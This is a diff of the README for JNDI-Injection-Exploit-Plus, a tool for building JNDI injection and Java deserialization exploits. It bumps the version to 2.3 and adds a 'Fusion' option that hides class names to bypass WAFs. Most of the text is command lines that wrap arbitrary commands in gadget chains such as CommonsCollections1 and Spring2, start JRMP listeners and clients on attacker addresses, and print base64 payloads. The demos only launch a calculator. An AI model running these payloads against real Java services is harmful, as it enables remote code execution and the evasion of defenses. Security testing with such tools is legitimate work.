@@ -135,15 +135,27 @@ JbossRemoting | Jboss Remoting Port Unserialization
135135- Example
136136
137137``` shell
138- $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
138+ $ java -jar JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
139139```
140140
141141![ ] ( ./img/4.png )
142142
143+ #### 6. Fusion
144+
145+ Hide class name to bypass WAF.
146+
147+ - Example
148+
149+ ``` shell
150+ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -F
151+ ```
152+
153+ Reference: [ https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html ] ( https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html )
154+
143155#### Web service to return Deserial Gadgets
144156
145157``` shell
146- java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar
158+ java -jar JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar
147159```
148160
149161``` shell
@@ -163,7 +175,7 @@ P.S. Param wrapper & output is opetional
163175Run as
164176
165177``` shell
166- $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
178+ $ java -jar JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
167179```
168180
169181where:
@@ -193,7 +205,7 @@ Points for attention:
193205Run as
194206
195207``` shell
196- $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
208+ $ java -jar JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
197209```
198210
199211where:
@@ -211,13 +223,13 @@ where:
211223- JRMPListener
212224
213225``` shell
214- java -cp JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
226+ java -cp JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
215227```
216228
217229- JRMPClient
218230
219231``` shell
220- java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
232+ java -jar JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
221233```
222234
223235## Examples
@@ -229,7 +241,7 @@ Local demo:
2292411 . Start the tool like this:
230242
231243 ``` shell
232- $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
244+ $ java -jar JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
233245 ```
234246
235247 Screenshot:
@@ -260,7 +272,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
260272### Deserialization Payloads
261273
262274``` shell
263- $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
275+ $ java -jar JNDI-Injection-Exploit-Plus-2.3 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
264276```
265277
266278Base64 Output Result:
0 commit comments